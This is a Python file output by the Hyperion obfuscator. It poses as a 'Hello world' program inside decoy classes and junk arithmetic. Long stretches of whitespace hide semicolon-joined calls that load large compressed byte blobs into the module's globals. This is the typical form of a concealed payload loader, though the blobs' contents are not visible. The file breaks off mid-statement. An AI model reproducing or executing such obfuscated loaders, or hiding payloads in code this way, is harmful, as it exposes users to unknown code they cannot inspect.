from builtins import *
from math import prod as _stackoverflow


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


_invert, _builtins, _theory, _statistics, Round, Math, Walk = exec, str, tuple, map, ord, globals, type

class _detectvar:
    def __init__(self, Floor):
        self.Modulo = _stackoverflow((Floor, 82350))
        self.Algorithm(_square=89305)

    def Algorithm(self, _square = Ellipsis):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Modulo -= -56429 / _square
        
        try:
            (Round, _builtins) if _theory < _callfunction else (Round, _builtins) <= _builtins

        except AssertionError:
            ((_theory, {_invert: _callfunction}) for _theory in (_theory, _callfunction) if _builtins is _statistics)

        except:
            Walk(-30091 - 85489) == False

    def _positive(self, _add = 67381):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _add /= 71155 * 27283
        self.DetectVar != True
        
        try:
            ((_builtins, (_theory, _callfunction, _statistics)) for _builtins in (_theory, _callfunction) if _invert == _statistics)

        except ArithmeticError:
            ((_builtins, (_statistics, _callfunction, _invert)) for _builtins in (_theory, _callfunction) if _builtins != _builtins)

        except:
            Walk(84381 * -72781) == False

    def MemoryAccess(Power = None):
        return Math()[Power]

    def _hypothesis(_power = -52194 * 34210, StackOverflow = float, Substract = Math):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Substract()[_power] = StackOverflow
        
        try:
            {_statistics: _statistics} if _statistics == _builtins else {'tB6elB': _builtins} is _callfunction

        except OSError:
            ((_callfunction, {_statistics: _statistics}) for _callfunction in {'tB6elB': _builtins} if _builtins > _invert)

        except:
            Walk(-38800 + 35650) == Ellipsis

    def execute(code = str):
        return _invert(_builtins(_theory(_statistics(Round, code))))

    @property
    def DetectVar(self):
        self.While = '<__main__.MemoryAccess object at 0x000004328BE90853>'
        return (self.While, _detectvar.DetectVar)

if __name__ == '__main__':
    try:
        _detectvar.execute(code = __code__)
        Ceil = _detectvar(Floor = -24686 - 19109)

        if 374854 > 8934002:
            Ceil._positive(_add = 86808 / Ceil.Modulo)
        elif 150644 < 7432915:
            _detectvar(Floor = 93848 * 35183)._positive(_add = 8285 + Ceil.Modulo)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='lljjijjijljlijijliiljliij',StackOverflow=b'x\x9c\xed\xbdkW\xe3L\x92.\xfa\xbd~EM\x7f8\xc0.U\xb5\xac\xab\xc59\xec\xb5f\x9a\x9e=\xb0\x01\xf7\x1afN\xd5Y5,\x96\xb1\xe5\xf75\xaf\xb1\xd8@\xbdP=k\xf6o\xdf\x19\x11\x19\x99!\xc9\x17\x19)\r\xee>\x18\xdbr:\xadK*/qy\xe2\x89\xa7\x87\x9f\x87\x1f>\xaa\xbf\xe9d\x1f\xdf\xe1\xef\xfa\xba\xb8\x99\xfcx\x1c\r\x9f\x8a\x87\xeb\xeb\x8f\xffp\xf4\x87\x7f\xf9y\x9f?L\x8b\xf9\x1f>\x16\x0f\xa2\xda\xf0\xc7\xd3\xaf\xc5\xc3#\xd6\xd9\xff\xc3\xcdt6\xfb\xf9\xf4k\xfeK1|\n\xe3\xe4\x0f\xde\x1f\xfei\xf6#\xff\xd7|\xfc\x87\x83\xd2\xaf~\x99>\xfd\xfa\xe3\x86v\xfc\xeb\xd3\xd3\xfd\xe3\xe1\x1f\xffHe_F\xc5\xdd\x1f+\xbb\xf9\xe3\x92c\x8f\xa7\x8f\xa3\xe2a\\\xde\x8d.\xfc\xf2\xcb/\x7f\xbc\x9f\r\x7f\xf9\x91W~4\x9b\x8e\xf2\xf9cN?\xfa\xf3_\xce>\x07_\xfcJ\x95Q1\xa6\xef\xf7\xee\x1f\xa6\xf3\xa7\xfd?\xfcK>\x9b\x15\x1f\x9f\x8b\x87\xd9\xf8\x1f\xfep\xb0\xf7\xe1\xe0\xd0\xd4\x86\xef\xf7\x1e\x7f\x9b\x8e\xf7\x0e>\xe4/\xa3\xfc\xfeI7\xe6\xfc\xfe\x87\xfa\xe5\xbf\x16\x8f\xf9\xe3\xc7\xe1C\xfe\xf1!\x1f\xff\xc7\xfc\xff\x9d\x16\xb3\xfc\x89\nnT\xcb\xfc\xc7\xfc\xff+~\xe0\xa7\xe1G\xd8\xc9\x7f\xcc/\x8a\x9bb\xfc\xf3\xe3l\xfa\x9b\xfa\xdd\xcf\xe2\xc7\x1f\x0e>\xd0IM\xef\xee\x8b\x87\xa7\xebku\xb4\x9f\x8f{\x07_\xf2\x97\xe9\xd3\xfe\xc1\x87Y1\x1a\xce\x1e\xf7\x0f\xbe\xef\x9d\x9d\x9c\x9d\x9d\x9e\x9c\x9e\x9e\xa9\x8d\x93\xb3S\xb5yr\no\'{WG\xbf\xcc\x8a\x1bU\xed\xc3\xd2:\xb0\x03\xbf\xf0\x8b\xc1`\x00\xafEQ\x0c|\x7f\xa06\xfc\xc1\xde\xf7\xc3\xc3O\x9f?}\xde\xff\xbc\xff\xa9wpp\xa5\xf6\x96?\r\x9f\x9e\x1eV\xef\xed\xeb\xb7o_\xbf~\xfb\n/z\xeb[}O\xe3\xe9\x9a\xbd\x1c\x17\xc7xN\xf0w<8\x86\x97B]\x0f]\xf5\x87E\xdf\xc2\xaf\xbe}\xa5\x07\x1d\xfb\xdb7:\x83o_\xd5/mC68\xf0\xf1@\xef\xfd\x18\x9a\xe4\x18\x8e\xbcl\xd7\xfb{7?\xa6\xb3\xa7\xe9\x1c\xee\xcd\xef\xc3\x07}r\xd5=\xc0\xae\xa1e\x07\xf8_@\xa1\xfa\x1e6\x07\x03\xb5\xf7\x01\xb4=\xb6<|\xc5\xb7\xc3\xdf_~\xd4\xc7\xf9\xf4i6\xfdqSm\xdb\x03\xef[\xa9\xf1\xa9\xfa+\xf6s\xf0\xbd\xab\x1d}\x99\xce\xc7\xf9\xcb\xfe\xde\xd3\xb0\x98Mj__\x1d\xac\xbe!g\'\xea\x1b\xb5\r\xdf\xc0\xf6\xd9\xc9\xdfK{\xe5?\x1e\xfem\xe3\xe6\x9a\xcd\xa6\xb3[5\x8dN\xe1\x05\x9f\x7f/\xcd\xf5\xf0\xf4\xb8qk]\x9c_\\\xa8\xa7z\xc0\xff9\x7f\xba8\xff{i\xb4\xd9\xf0\xf7|Q\xab-\x9d\xc4\xb0\x85.\xe8\x95\x1a\r\xde.\xfen\xda\xab(\xea\xdfr{-X\x91\xa6\xb7\xb7\xd3)\x0c\xc6\xe9\xed\x0c\x87\xa6\x1a\x92\xd3\xd9\xdfKk\xe5\xb3\xe9\xfd]1\xdaxX\xe2\xe1\xe8\x88t\xc0o\xaa\xc5\xf6\xf6\xbe\xdc\x16\xd3\xf9\xd2\xa6\x1e`\x93\xfa\xf0\xa7\xb6\xa8Y\xfdW\xb5\xf4t:z\x1c\xce\xa7\xad[z\xe9~6m\xe9\xe5;\xe2\x96\xfe9\x99\xce^\xf2_\xe7?6nkj\x12\x94H\xe0O\xb5\xdc\xeb\x1am\x17\xbb\xe7\xe3l\xf8\xcf\xafX3\xce\xcfi\x0e\xd4\x1b\xf8\x7f.\xf7\xb3tY\xd9\xdf;\x08\xaf\xc3\xeb\xfeur\xed_g\xd7\x91\xda\xce\xaec\xf5\x8b\xa8^\xdat\x87=\xfcIr\x1d_\x07\xea\x99]\'\xaa~P-k\xb6\xb3\x85Ch\xfff/\x0c\xe2I\xd8S\xcfT=\x13\xf5\xf4\xf53T\xcf@\x97\xa5\xc1M\xd0\x0f\xc6\x8d\xea&A\xa6\xc4\xe5q\x0e\x1a\xd7\xfe^\x7f\xf2T\xef\xb7\x07\xf4\x82\xcf\xbf\x93\xfe8\xca_6Z\x8c\x97\xdd\xae8\x84\x87jl\xf3n\xb7\xe9!\xcb\xe1\xb9\xeef\\\x1dm\xdei\x824\xc9\x93^2N\xe2 ]{\xb37\xbe\xc6h\xa2\x1e\xea/\x99\xe8-\xf5\x9a`\t\xbe\xab\x87\x93k\n\xa2^\xea\xa7\xbe:n/U\xcf x\xfd\x95\xed\xa9\t\x06&\x17\x98eP\xbd9;m<\xe4U\r\xbf\xe5\x90\xf6\x831\x0e\xd7^\xf3\xa1\xf8\xba^\x90\xfa\xd8V}\x17\xbd \xc9\x92\xa1z\x8e\xf4c\xa8\x9eT24%j\xcbM\xef\x8e\xc3(\x8eF\xea\x19\xc6Q\xe0\'\xfdd\x92\x86i\x14O\x92\x9b$N\xb3`\xa4\xca\xb8\xff\xab\xed4Q\xdb\xa34\xa6OI\xac\xbeS3f\x9a\xa9\xde\x14\xa9O\xeaw\xb2F\x92\xa5j\xbaL\xfai\xa4\x1e~2Q\xb5G\xb0O*O\xd5\x1c\xaa~\x1d\xa7\x01\xd6\x8d\xd3\xbe\xaa\x93\xc1\'\xfc6V{\x0c\x03_\xed6P\xe3`\xac\x8e\x16\xaa=\xc0yeP\xc3\xc5}\xb0\xf3\x89\x9dm\xca\xdb\xf0\xeahD\xa6xu\xa9\xba\xdbq\x9b\xf1\xb8\xec\x08\xaau\xfbi\x8a\xaf\xb4e\xb7\xe9Sj\xb7\x1d]a\xa0\xeemO\xf5\x8f8\x18\xe3\xf6D\x1dJ\xf5\x814pr\xbd\xa9\xb9\xaa\xf2\x95\x96\xdf\xfb\r\xaeu\xb1\xae\xb8\xbf\xff\xbf\x17\x08\x9d\x07\xc5\xc3\xfe~\xdd\xd8s0\x9c\x8f\xf7\x17U_5\xb3*}\xebV\xabZ3P\xbc`\xab\xe5t\xd9\xd3\xd3\xa5\xdfl\xba|\xdd\x8d\x86i!\x18\xc7q\x1c\xba\xb8\xb1\x91\xfeKx\xa9\xd4\xcbe\xc4\xdb\x13\xfef\xf7\xc4\x818\x8d\xfb\xea\x99\xe2\xbb}\xa4\xa5w\xfd\xc9\xcd\xd5u\xb1\xcc\xed\xdd\xdd\xdd\xcd\xef\xe6sz\x85w\xd8\xb8\xbbk\xd9w#-\x91\x83\xe4\x9dii<\xd6\xdb\xf0\xde\x87m-\xbd7\xa9\xdbw8\x06T;\xc2\x04\x97$\xb8\xac\xb7\xea+{0\x91(\x01\x0b575\xa5\xa0\xb4\xa5&\x15\x07R\xd6\xde\x81\xafj\xf4\xde\xb9\xfc\xd6J\x8e\x0b`Z\x8a\xe28\x88}\x94+\x92(\x03\xe9\xc7\xc9D\x95E\xea\xe6\xd33B\xe9\x8e?\xcbRx\x8d\xd6^\xfbk\xafU\xaf\xaf\xddH\xfa0\x8c\xf5\x1f\x8cj\x1c\xd78\xc2\x1b\xf7.\xd4\xe5{\xd7}\xa5\xd5\xa7\xea\x19\xa1\x96\xdf\xab\x97nw\x95{}g\x8aFj\x8c\x87 \xf0\xb6S\xa1f\'\xb3\x19>gz\x93>\x9f4\xb7\xc6\xf4\xaf\x03|&\xd7`4\xf1\xafC\xb4\xc6\xd4Jw\xa4a\xdd\xea\xdcc|\xe4\xfa\t\xaf\xb9~\xb5\x9f\xd5\x96\x9b1\x99*MKI\xbe\xc3h\x0c\xfa\x92Z\x1eZ\x8d\xc9\xa5\x1aen\x1ec\xf5\xc8\xf1I\xdbc]\x92\x9bR,w$\xf3\x83>\x97\xc1u*\x8dp\xdcj\x90\\^\x06\x97\xf8\x84\x7f\xfd\xbc\xdc\x01q8\x8dGJ\x1cn#\x00\x04\x97\xf8\x08\xcc\x85S#\xb4\xbe\xfa\r\xd7\xde7\x17\x84\xd4\x84\x08\x7f3z\xc1\x19\xd2\x89\\CF\xe7L\xcd\x9c\xa9\x9a3ayJ\xd5/|\xb5HUJ\xb7)(\x85\xda\x16\x1di\x1btOo\xf3g\x90jc-\xfd6\xa9\x1bmK\xe0JR%\x82DN\x04\xac\xbc2\x89\xcb\xe9\xdcL\xf2\xae\xccf\xaac\x83\x89*W\x1d\xfb\xa6U\xb7\x9e\xe9?Z\xff\xb1{\xef\xc0\xb4\x16\xc4j\xe9RW\x1f\x81\xe1\xce\xbd9\x87\x0c\xff\xd6\x05Pv\x068v\x01\x04\x11\x08#\x99\xea\xc9\x93VK\xd8\xf3\xf3\x8b\xfa\x7f\xc1\xff\xe7g\xd8T\x7f\x9b\xc8x=|D8\x03\xf5\xaf\xfbZ\xc6\xab\x94\xee\x88E=PrP\x1f\xd7\x06\x90\xf3|5\xa0\xfa\xed\x0cF{\x80J\x1b\x80]\xcd\x87\xa3\x0c\xe8}\x9bs\xf4\xd6\xc4\xe3\x92\xb1\xb8\xcd\xdcC\xee=t\xed\xb1\xc3\x0f\xfe\x9a6\x1a\xf4\xb8\x18\xbd\xbd}\xf5\x1e\xa9^\x08zG\xbf^\xfa\x0e\x8c\x15jx\x90\x8f\x99\x86J\x8c\xc3\'\xa8\x97n\xbf\x0f\xbcG\xa3\xc6\x9e\x0f\xe6i\xc2z\xe2PR\x1bm[F\xd8\xe2"\xe1YO\xf4gx\xefi\t\xa6I]\xb7\xab[\xf7-z~a\xff\xf0D\xe0]\xbd\xfe\xad\xd9\xe6\xdeM\x83_\xe830\'r\xd1\xb8\xb5\xdfTgR\xd7\x9f\xfa H%=X\x17A{R3~\x9a\xf4\xd0S\xea\xc6Z0\xae<\xf2E[\xae\\\x0e\x9di\x88\x05y\xd5\x00\xfe?\x18\x90\xafm\xbb\x02\x80\x9e\xaa\xfa\xe2\x19\xe8w\x9e\xba\xe4\x14\xb7\xae\xaesA"\xf0\xdbi\xe4\xa7\x08,;;\x03\x7f\'\x82@\xde\xedd\xd6\xd7M\x1a\x8b\x15%\xd3M\xdd\xd7:2\xdf\x9a&u7\\\xdf\xdf\x1f\xe8D8\xc8%\x08\x80]\xe6i#\xd7\xf8k\xae\t\xb4\xe6\x04Z\xd9\xc9U\xf5\xcd\xf9/\xba\xb2\xf2w\xae\x80\x0e\x9d\x81\xabV\xfa\xc0\x192f\xb7\x8c\xf7\xdb\x95\xef\xbb\xbb\xa9z\xe9R4.\x19\xac\xad\xd1:_\xf4\x8d#\xb7Y\x08\xa0\xa6$F\x1cC\x9e\x02\x00*m)\xf9\x91\xec\xa7E\x10|8\x99(C\xa5\xc2\x90\x15\xc0W\xef\xf0)B\x1bA\xad\xd4\xc1\xd1\x97\xce\xbc\x89^\xd8Ba\x81\x8c\xc4b\x07\xb3i\xa0g\xde&u\xb7\xe6*V\xc2\xd7(\xc9\xd9\x89\xca.\xa9p\xa8\x16M7\xee\xe2Q4$w0>F\xfa9\xd4\xafT\xa6\xea\xb8\x19\xdb\x11\x00\xf8\x125g\xc5\xc9(\x8d\x9c\xa0[\xfa%d\x8b\xdc\xb2\xb8\x17\xf5p\xe5\x0c\xef\\\xc1Pe\xc7\x83c\x88\xde\x18`\xd9\x00\xe28\x8a\xc2\xc9\xd0N\x10\x03\xef\xa3\x0b\x02\xec\x14\x00\xb7O\xabe\x1d\x88\xaf<\xdazZ\xfea\xff\x01\xfb\x13\x02!\xbe\xae\xab\xbb\r\xc51\x05wj\x12\xd2k+a\x16m\xb2\xf4d\xeb\xecss\xf3\xecF\x96+\xb8a!z\x92\xfa\xf8\xe8]\xf7\xf0v\xd6J\x9dt\xa5.&\xf5\x16\xb8\x9d\xd7O\xc8\xdd\xfa\xce\xf7P?\x04\x1b\x17\x1c\x08\xa1\x99mM\\}\xdd\xf9C\xa1\xc7\xf5\xf4 \xf1\xd9\x8c%\x94\x8cuuc\xa7~\xe9H\xb5e\x90\x84-\xc1~\xe0\x99\xd6\x0ej\xf6S\x07\xad]\xd3AE\xe3\n\x84\x16\xc6\xe5=\x11\xa9\xb3\xae\xaeS\x07\x7f\x98\x86\xbd0\x08\xc3\xd0\x0fc\xb5\x1d\xe1\xe7a\xd4S\x8f~\xac\xeeo\x92E7Q\xaa:\xeb\x18\x94\x9f\x00\xbc\x92j\x85M3%f\xaa\xb56\xea\xab_\x86qO\xadFy\n\xbe\xd2^\x92G\xb0\xa3a\x9c\xb6\xf3,\xae\x03\xa6\xf1\x83\x00i\x16\xae\xe6(\xd4 \x80\x90\x01\'\x92\xd3\xd8x|\xf3\n\xb8')

        if 399050 > 6442160:
            _detectvar(Floor = -41053 / -35825).Algorithm(_square = Ceil.Modulo - -14087)
        elif 163970 < 7344869:
            _detectvar(Floor = 25543 * -48722).Algorithm(_square = Ceil.Modulo - 32597)                                                                                                                                                                                                                                                          ;_detectvar._hypothesis(_power='IIlIlllllIlIIlllIIllIl',StackOverflow=b'G\xfa\x87\x1dy\x82+\x10\x97V\xe6\x14\xc2~\x9d0\xfck\xd6\x10\xdf\xb0t\x18\xa5bH\xf0<\x93\xc6\x16\n\x0b\xe5\x91\x1eFM\xea\x86.\x87Q\x80\xf1#\xeau\x0c\xafq\x06\xafj\x00\xc1k\xabfm\x10\x11\x91\x8a-a\x00)}\xd3,V\xe0M\xcd\x05{\x10\xeey\xa6A\xc2\xf0\x82\x88\xe1\x9d\x00\x13t\x8bT\xc5%\x88\xf0b\xfa\xaf\xe1\x82\x04*t\x80\x8e\xcb\x0c\xdc\x96\x00\xf2\xd1P\xcaZ\xe9\xdb\xbb4\xc1\xbbJ\x98\xa4\x90^U\xfd\xacZ\xd6\xc1\x0c\x12\x8b\xc5TB\x89x\xa6\xc8\xc4\x0c\xb2\xaenC\xd0}\'\xf2b\x8a\x90\x8d\x1c\xa5\x9cv~\x05@l\x90J\xa0\xb5\x82\x86j\xc1\xd2f\xe5&\x8a\xf5\xb3\xa7\'\\.\'\xe1\x8f\x9a\xb5I\xdd\x86h\xaeWNPy0\x89\xda\r\xc8cT\x94\x81\xe3\x00\\2jk\x07\xdcp]:\xa6\x9e\x05\xe6\x87\x94\xcc\xe7\rt\xcbL\r\xe5\x08a\xdc\x04\xf4\x0e\xaf3\x04$\xa6\xd5\xd2\xa6;$t\x06\xa0\x18\xe1\xe7\xf0\n\x08\xc7\xa4^\xea\xc8J\xe9\xa3v\x0b\xf3S\x82GJp\x8a\xad\x95n\xd3?\x14kM!\x10\x93V\xaaU1\xd6(XukR\xb7\xa1\xea\xd6\xddd\xd7I\xe4\xd6\x14\xe9\x96n\x91q\t\xc3\x0e\x1b#l\x93k\x8a\xee\x80G\x88\x01\x07)\x9a4j\xa5\x8d\xbb\x94\xea\xdc1\x86\x83D\x08\xd0!\xbc[\xaf^\xfa6\x80\x9d\xb7\x8b\x0b]\xc9%0a\x07Pb>%\xfcI;\x88v\xd55T\x86{2\x03\x84\xdc\xaa>\x1d\xc9\xeb\x9d\x04\xfd\xac\xbe\x8b\x89~\r}\xbe\xab\xf0\xa0O\xa1\xff\x9e\xafk\xef\xdb7\xcdy\x84\xa8\xc2\xaf\x8c.\xfc\xe6d)qX\x19\xe7\xad\x0c\xd7\xd8\x18\'\x9b\xf03\xc7\xaa\x95Jw\xd0\x90\xba\r?\xeePSZ\xf0;=3\xa2\xb2\xd0d\x17\x86\xe4bg<>\x03-\xc8\xa2\xab\x07\x10F\xc7\xbb!\xc8v \x1a\xd0\x11/\x84\x13\x1b\xfe\xdf~\xa0n\xa4_\xbf\x11\xca\xbb\xe9\x88\xdd;\x08\xd4\x8f\x1bz\xe7Wz!z\xb1\xa5\xaaboBO(\x8d\x99\xf0B\xac\xab\xdbTg_\xdew\xe6\x143L\xf1\xc2w\xfa\x93\x93\x1b\x9c\xa1\x99&\xd2\x134\xe0\xd0CT\x95\x88\x91L\x9467\xb2d\xda\xf2\xd3G\x8cx\x1f\xe5\xda\xac^\xea\xa6\xbf\xe2)\x87\xd7\xa0\x1c\x85\xf4\xf8L\xa8\xf5J\xe9\xdb\xaeB-l\x0b\x1d\xd1\xde\xec]\xb0(~A\'\xe0\x08aCA\x02\x102\x10 \x96\xc6G\xdd5\xae\x97:\xea\x0e\x19\xf6\xe4\x04\x8f\x05bH\xf0\x99h\xf2*\xa5\xdbt\x05\xb7\x9c\x0f[\xf4\x9d$\xeaE#X\xe3[\xf5\x9cSbG\x04\xcd\x0c\xcc\xe6\xa7\xc8c\xd6\x90^cm\xb0C\xa2\xe7V~\x97\x86\xbc\xb0\x12\xec\xb0\xaan\xe0R>\x10\xccL\xad<\xc1\x01\x85%\x07\xc6\xfc\xbeY\xa0\xf2+\xa6\xfa\x10\xcdU=\x9c\r{f\xaa\x8f\xca\xa5\x1d\xe0\xd72ms\x95\x16\x1e\xf61G\x02\xbb\xb6\xaa^C\xe7Y\x9b1a\x80\x04|\x0eI\xe9\xf8v\xc9_V\xa7\xc9\xfc\xbf\x82 DS\xfd\xcci\x85\xd7\xf4 \xea\xad\xe5\x1d`\xfb\x1a\xe3\x8b\x18\x9f\x1d\xc6\x82\x93S0\xff\xac\xab\xbb+Vc\xa2Z\x06\xdee\xb0\xc9i\xcb\xdcm\xd3\xf1\x91"oj\x0fiX\xfb\xb44|\x86\xe0\xbcZi\x07\x96S\x16#\xab\\K\xec8\xf6\x85\xe5tU],wN\xe5\xe8\x14\x81^\xe3\xf02\xb8\xc6\x1a\xe61u\xc7\xe3\xd5\x05\x81\xca^\x81\xe0F\xc07\x1e\xe3\xf7\xa8\xf86\xd4x\xdfL\xb6x\x7f\x843u\x02\xdb:\x8d\xed.Q.\xeeAW\x18\x14\xc7\xd4)T\xaf8F\xe0k[\xf0\x9c\xf1\xb2\x88\x99;\x14s\x03\xcc\x13\x92\x9dy]\xdd\x86\xec\xcc\xef+Do\x8fL\xa66*\xfb\x1bYP\x1b\x86d\xbf-\x8a\xc3}\xe0\x8bf\xc4\x95|\xb9\xcc\x96;4\xc6\xc6\xdd`S;\x17\xe6\xb4\x8bM\xf4\xd5\x18Wn\x08\xe6\x80u<Uj_\x1f\x9d\xb7\xb5\xd2\xed\xdb\x04\xdep\xad\xa2\x96\xc4W\xfdN\x06\x81mZ\x06yF\x8ab\x1b\xb9\x9eI\xf9S\x00e\x96\xd5\x0b\xb6 \x01u\xdd\x95-b\xf1\x84_\xdf\xde\xd4\xdb\xd7H\x86\x0c\xad2\xa1\x0e\x99\xc8\xea\xa5\x1d\xa8\x87\x1c\xbf\x9b\t\xc5\xc3h\xf0B=\\U\xefU\x84L\xb3\xe1\xdd\xcdx\xf8\xf1\xfc\x82\xfb>\x8d\x02:\xef\x8b\xf3\xc3%\xb7l\x85\xc8\xe7c!< \x84\xba\x92@\xcd\xfd,\xf2\xca\x85\x07\xc2\x01R7\xc1\xf1\x82YJb\x8a\xf3\x1a\xce\x989\xa8\x1c\x85\xc9w2K\x92nn\xf5\xf3\xbb\xf6\xcay(&\xb0^l\x83\x81\xd8\x8b\x90\nR\xb2U\xf5\\\x8ak\x10$\x14\'y\x1aU\x84`\'\xc2~9K\x85\x14\xf7m\xd9\xae8<\x1b3F\xc8\xb0\\\x1b\xaakx\'\xdf;rz\xcduJ&\xcd*\xaf\xa6ywt\x8d\xad\xc1\x97k\xafm\xbc`K\xdc\xbb\x1d\xe1\xfe\x90\n\x13\xebM\xcd\xc1k)\xc2\xd3\x12\x84v\xf74\x7fnZ/u"\xa9\x04h\x92K\x11N\xe2\x93cO\xfd"\xac\x97:\xf3)\xa5\xe8\x1d\x85\xe3\xb1\xc74\xa8\x976w\x91\x91\xdd\x9d@\xe8\xe0nM\xd1EV+m\x8e\x17\xe5\xb6\x00t{\x1f}^Q\xb5\xec\xed\x1d\xa0-\x9dY\xdd\xa0\xaf`\xa7>2\xdf\xc1\x81\x00\xa7\xb2\x1b\x02\x9cSL]"\xd3B\xd8Gd3-\xb9"\x92(\x91\x84\xb6\xe4^\'\xe8\x04eU\xb8\xeb\xc6\xb1\xd2\x13\xf2\x98Lt\xc6q\xa8I\\\xf7R\xae\xaa\xeb\xd2K\x19,\xca6\xa4\xb3\x14\xb9\x14\xfb\xad\xe8_}\x8c]\x89\xfa\xa1\x93x7\xed~H\xcbiDJ\xa5\x82\x88\xa1\xcd\x95\xb9\x0bzZ\xe9\x84b\xedBj\x18\x89\xe9\x99\xd6\x01\xb5\xaa\xde&\xf3\xff\xe6\xf3\xd0\xc8\xe6\x82\xe0\x87\r\xc5\xe5\xe0[\x99\x1d\xc2M\xffj\xc7\xfa\xb5\xe2\xea,\xd4s\xa8m\xb3\x99\xf9\x94\x19\x0b-\x01A\x1d\x81>\xd3<\x1e\xa9\x87\xaf\x8e\x10\xa6\x11e\x17K\xdb\xf1\xca\x9e`,\xae6r\x81uk\x17l\xf1\x1d\xae=Dk\x82\x1f\x8f\x8f\x11\xf4\xfa\xb7\xc9\xaa\xeb\xd2\x07(\xd3\xbf\xc8\xc8\xfbz\x8a\x18~o7\x01\xc3\x9c\xdaV&f\xa2U6M3PDn\xf7\x04\xecb]\xdd\xa67pyO\x84,\xd4\x00\x8a\x00T\xc4lz{\x8bo\x8dm\xcd\x1b-J\xb1\xceI\xd3\xd3X\x89X\x87\xc8\xd5J;hd_<9\xf4\x9e\xcde\x91\xf0\x1b\xac\xab\x1bn\xe6;xc@9\xd8\x98\x0br#\x17\xc7\xcd\'\x957\x86\xd2w\x82\x1d\xd9{ya\x1a\xf8\x17\xa2\x84\xd7\xb4C\x1d8\xa0\x18\xe8\xc4\xb4(lgeTa \x9cP\xeb\xea:lJ\xe3\xb6g\xe9\xcb$`\x8e-\x0f\x85\xe4J]W\xb7\xc9\xec\xf2\xaai\xdbx\x99\x87\xda\xef\x9c\x99\xc0\x16\x96q\x1c\xc92[\xb0o\n\x99S\x92\xc1\xd8\xcf.\xael\xa3%}UP\xb5\x0e\xa9\xb6\xb4]\x8dC\xaa\xbb\xd098f"\x12=\x92\xa7a\xbb\xe6Y\xef\xc7\xaa\xba\xc9fS\xf7+e\xc2$\xc9(?/\xd0\xd5\xb4\x93\t\xd5\x86\x92\n\x8f\xd1U\x08\xccw\x08\t\x1a\xecF\\?\x0c\xa80\xb9I0\x11\xb1\x1b\xaeC\xcaP\x9a\xe8\xf0\xdbHl\xf17\x9a\xbbUg2\xdd\x05\xc8\xca\x8aI2\x13\x10\x9c\xac4E\xa2B\xf8\xde\xa7\xc7\xbd\x8bs\x06\x8e\x9c3\x86d\x9b3\x89\xe4\xfdf\tZ\x92\x0c LV@\xdf\xd6\xd5\xdd\x00K\xf0\x86\xce\xe8\xcb\xcb\xe0R\xe66\xbb\xdc\x88\xa8g\x87TK\x03uf\xac\x87\xb48\x99\x10\x01A\xf7\xb2\xaen\x93\x88\xbcWD\x9e\'&\xe6<\xf4C?)E\xa2\'\x13*\x8d\xf4\xf7\xael\xe6\x12X\x19\xa5q\x1f3\x03\xa9\xe1\x9d\x04\xae2\xa3\xd7\xe1\xb82\xe7{9\xe5\xd4\xfak\xd6\x88\x1c\xe0\x95,\xf0(t4<\xe8\xc6p\x9c\xa5\xb7j\xa4\xd9\x82\x87\x9a\x19\x98\xb7Gz\x8b\xca\x87\xf8\xa9\xa5-\xe1\xcd\x9c66b\xdc\xbe\x0f\xc5ggQ\xe3\xdbX3\x17\xdb\x7f\xacq\xd8\xd1=K\xb5q\xb4\x07\xa4\x95i\x8a\xd4X\xad\xe4\x9f=J\x1a\x05\x0ew\xf4\xbao\x06Wv\x17\xbd\xdd\xcd\xba\xcc\xeb\xac/\x0c-\x8c\xdbc\xea\xad\xb4\x12V\xb5\xaanC\x8cS\x07\x06\x9a q\x82n\xaa\xa0`\xca9b4f\xc4\x8d\xc6(VE\xe6\x99\xe3\xe0!\xf6F\xc6\xc2Z\xb0\xben\x1b\xcd\xf3L\xfdA\x0e\xf6\xb3S\x88\x17=\xc3\xa0\xd1\xb3\xb3\xd6y\x1b\xd9\xde\'\x03A\xd9\x88\xca\x19\xed\xfb\xc2\x16\xb8\xaen\xba;\x94\x8d\xcb\xf5(v\xdb\x1bm\xca\x88#X\xee(\xd3\x05\xf2\x89\x83{9\xc3\xe4\x84)*\xcdc\x88\xefp\xc4\x8d\xbf\x80\xdc\x88\x04\x0f~uDg\x94\x1a\xeclK\xf4\xfd\x05*N\xf4\n\x87l\xa8@\xbd\xad)\x00\x96\xc3\xd2\xadv\x97o\\\x12\x14\xe7%<A\xe9\xf3.\x085{DRL\xb9\x98g\xda;\x8ae;\xe0\x19\xed\xc6yqKDy\xb3\xe9Tm\x91Sj\x9b\x82I\x12\x97\xe3\xdf$\x94\x81\x8d\xf92\xa7\xca\xba\xba\xee\x93\xbd\xb2\xc1\xc0\x85\x02\'\xe3i-\xbcE>\\\xe5\xb2r\x98\x9f\xcb\xd8\x06)\xc3\x93Y\x07\xd9\x86hW\xc1]\x02\x89\x944W\xa9\xabZ\xdd\x95K\xdd\xea\xae2\xf9\xb0\x1b\x9b\xe8H\xb8\x8c,4\x869\xcf\x1c\xba\x8d\x94V\xa7$B\x0b\x95sn\xf3\xb5 \x9f\xa1\xb1\x02\xdb\xeb\xcf\xda\x86d\x92\xe2\xd78J,\xc3\xe8G"\x91%\xe84\xb1\xe5\xf6\xab\xa5N\xd4\xcePC\xc5\x13\x84\x8e\x03R\x80\xd2t\xd7J\xb7o\xbal\x07\\\xd3\xf79\xd3\xf78\x13nQ}\xdf\x1d\xcdC\x90\x15CJ\xdfy\x02\x02\x9b\x13\x88$\xeb\x19\x820U\x96D\xd6\x97\xc3s\xf2.Z\xd6*9\x12ky\x1f+\xa5\xa9\xb3<\x89\x86\x9d\xa0\xd3\x08z:\xf0\x85\xd6D\xceI\x1d\xb9h\x9cfy3#\x93\xce\xbf\x95j\xc2}\n\xdd\xe8\xd5K\xdf&<\xe1}q\x1b\xac\x0b\x99+\x87\xcb\x95\x83\xe863\xc2\xbf\xea\xaa{\xb1\x1f+\xf5H\xbdGn\x02\xae\xd8\x81\x92\x18w\n=\x13t\xba$\xad\x9d*\x10\xf3\x9c')

        if 117120 > 8118640:
            _detectvar(Floor = -50818 - -21501).Algorithm(_square = Ceil.Modulo * -22752)
        elif 321434 < 2484343:
